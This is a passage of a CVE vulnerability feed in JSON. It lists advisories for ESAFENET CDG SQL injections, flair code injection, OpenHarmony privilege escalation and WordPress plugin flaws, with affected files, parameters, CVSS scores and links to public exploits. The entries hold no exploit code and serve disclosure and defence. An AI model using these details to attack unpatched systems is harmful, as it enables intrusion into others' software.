Affected is an unknown function in the library libcrypto-1_1.dll of the file FlashFXP.exe. The manipulation leads to uncontrolled search path. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-17T11:15Z", "lastModifiedDate" : "2024-10-18T12:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10069", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/20a4440e-1268-4df1-ab95-8583b450b7c4?code=G8A6P3", "name" : "https://flowus.cn/share/20a4440e-1268-4df1-ab95-8583b450b7c4?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280718", "name" : "VDB-280718 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280718", "name" : "VDB-280718 | ESAFENET CDG MailDecryptApplicationService.java actionPassMainApplication sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.419869", "name" : "Submit #419869 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ESAFENET CDG 5. It has been rated as critical. Affected by this issue is the function actionPassMainApplication of the file /com/esafenet/servlet/client/MailDecryptApplicationService.java. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-17T15:15Z", "lastModifiedDate" : "2024-10-22T14:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1007", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252276", "name" : "https://vuldb.com/?ctiid.252276", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252276", "name" : "https://vuldb.com/?id.252276", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=1yesMwvWcL4", "name" : "https://www.youtube.com/watch?v=1yesMwvWcL4", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.252276", "name" : "https://vuldb.com/?ctiid.252276", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=1yesMwvWcL4", "name" : "https://www.youtube.com/watch?v=1yesMwvWcL4", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?id.252276", "name" : "https://vuldb.com/?id.252276", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file edit_profile.php. The manipulation of the argument txtfullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252276." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:razormist:employee_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T16:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10070", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/b2afb61c-cdbe-4303-b799-f7c82a9643fb?code=G8A6P3", "name" : "https://flowus.cn/share/b2afb61c-cdbe-4303-b799-f7c82a9643fb?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280719", "name" : "VDB-280719 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280719", "name" : "VDB-280719 | ESAFENET CDG PolicyPushControlAction.java actionPolicyPush sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.419870", "name" : "Submit #419870 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in ESAFENET CDG 5. This affects the function actionPolicyPush of the file /com/esafenet/policy/action/PolicyPushControlAction.java. The manipulation of the argument policyId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-17T15:15Z", "lastModifiedDate" : "2024-10-22T14:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10071", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.280720", "name" : "VDB-280720 | ESAFENET CDG EncryptPolicyService.java actionUpdateEncryptPolicyEdit sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280720", "name" : "VDB-280720 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.420913", "name" : "Submit #420913 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://flowus.cn/share/d1a29ce2-346c-4a8e-836a-e9533c32fad1?code=G8A6P3", "name" : "https://flowus.cn/share/d1a29ce2-346c-4a8e-836a-e9533c32fad1?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in ESAFENET CDG 5. This vulnerability affects the function actionUpdateEncryptPolicyEdit of the file /com/esafenet/servlet/policy/EncryptPolicyService.java. The manipulation of the argument encryptPolicyId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-17T16:15Z", "lastModifiedDate" : "2024-10-22T14:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10072", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.280721", "name" : "VDB-280721 | ESAFENET CDG EncryptPolicyService.java actionAddEncryptPolicyGroup sql injection", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.280721", "name" : "VDB-280721 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.420914", "name" : "Submit #420914 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://flowus.cn/share/dd690c21-bb5c-4db4-a737-afb2cf54c8e1?code=G8A6P3", "name" : "https://flowus.cn/share/dd690c21-bb5c-4db4-a737-afb2cf54c8e1?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in ESAFENET CDG 5. This issue affects the function actionAddEncryptPolicyGroup of the file /com/esafenet/servlet/policy/EncryptPolicyService.java. The manipulation of the argument checklist leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-17T17:15Z", "lastModifiedDate" : "2024-10-22T14:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10073", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-94" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.280722", "name" : "VDB-280722 | flairNLP flair Mode File Loader clustering.py ClusteringModel code injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280722", "name" : "VDB-280722 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.420055", "name" : "Submit #420055 | flairNLP flair v0.14.0 Code Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/bayuncao/vul-cve-20", "name" : "https://github.com/bayuncao/vul-cve-20", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-20/blob/main/PoC.py", "name" : "https://github.com/bayuncao/vul-cve-20/blob/main/PoC.py", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in flairNLP flair 0.14.0. Affected is the function ClusteringModel of the file flair\\models\\clustering.py of the component Mode File Loader. The manipulation leads to code injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:informatik.hu-berlin:flair:0.14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.6, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-17T17:15Z", "lastModifiedDate" : "2024-10-29T17:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10074", "ASSIGNER" : "scy@openharmony.io" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-12.md", "name" : "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-12.md", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "in OpenHarmony v4.1.1 and prior versions allow a local attacker cause the common permission is upgraded to root through use after free." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:openatom:openharmony:*:*:*:*:*:*:*:*", "versionEndIncluding" : "4.1.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-12-03T13:15Z", "lastModifiedDate" : "2024-12-11T03:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10075", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/a984976c-291a-4f68-90d4-e452605ea7d1/", "name" : "https://wpscan.com/vulnerability/a984976c-291a-4f68-90d4-e452605ea7d1/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/a984976c-291a-4f68-90d4-e452605ea7d1/", "name" : "https://wpscan.com/vulnerability/a984976c-291a-4f68-90d4-e452605ea7d1/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Jetpack WordPress plugin before 13.8 does not ensure that the post created by the Contact Form is only accessible to authorised users, which could allow unauthenticated users to run arbitrary shortcodes and block." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:automattic:jetpack:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "13.8", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-04T16:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10076", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/15f278f6-0418-4c83-b925-b1a2d8c53e2f/", "name" : "https://wpscan.com/vulnerability/15f278f6-0418-4c83-b925-b1a2d8c53e2f/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/15f278f6-0418-4c83-b925-b1a2d8c53e2f/", "name" : "https://wpscan.com/vulnerability/15f278f6-0418-4c83-b925-b1a2d8c53e2f/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Jetpack WordPress plugin before 13.8, Jetpack Boost WordPress plugin before 3.4.8 use regexes in the Site Accelerator features when switching image URLs to their CDN counterpart. Unfortunately, some of them may match patterns it shouldn’t, ultimately making it possible for contributor and above users to perform Stored XSS attacks" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:automattic:jetpack:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "13.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:automattic:jetpack_boost:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.4.8", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-04T16:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10078", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L111", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L111", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L112", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L112", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L113", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L113", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L114", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L114", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L115", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L115", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L116", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L116", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L117", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L117", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L118", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L118", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L119", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L119", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L120", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L120", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L121", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L121", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L122", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L122", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L123", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L123", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L124", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L124", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L125", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L125", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L126", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L126", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L127", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L127", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L128", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L128", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L129", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L129", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L130", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L130", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L131", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L131", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L132", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L132", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L133", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L133", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L134", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L134", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Easy Post Types plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 1.4.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options and posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:newsignature:wp_easy_post_types:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.4.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.5 } }, "publishedDate" : "2024-10-18T08:15Z", "lastModifiedDate" : "2024-10-22T16:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10079", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L1318", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L1318", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d038f1a2-4755-417f-965d-508b57c05738?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d038f1a2-4755-417f-965d-508b57c05738?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Easy Post Types plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.4 via deserialization of untrusted input from the 'text' parameter in the 'ajax_import_content' function. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:newsignature:wp_easy_post_types:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.4.4", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-10-18T08:15Z", "lastModifiedDate" : "2024-10-22T16:27Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1008", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252277", "name" : "https://vuldb.com/?ctiid.252277", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252277", "name" : "https://vuldb.com/?id.252277", "refsource" : "", 